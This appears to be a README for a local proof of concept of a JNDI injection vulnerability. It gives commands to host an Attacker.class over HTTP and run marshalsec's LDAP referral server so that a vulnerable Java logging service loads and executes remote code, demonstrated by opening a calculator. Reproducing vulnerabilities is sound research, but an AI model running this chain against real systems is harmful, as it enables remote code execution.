The remote/Attacker.class is already compiled with Java 1.8.0_292.
You can use javac Attacker.java to compile it if you're using another version.
Total of 3 processes are required to reproduce it.
If Successfully triggered,
The console will print Constructor and the calculator will be opened automatically.
Use python to host Attacker.class file:
cd remote
python -m http.server 8888
Use the marshalsec tool to forward jndi requests to the attacker's service:
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Attacker"
Use the command line or IDE to run src/main/java/LogService.java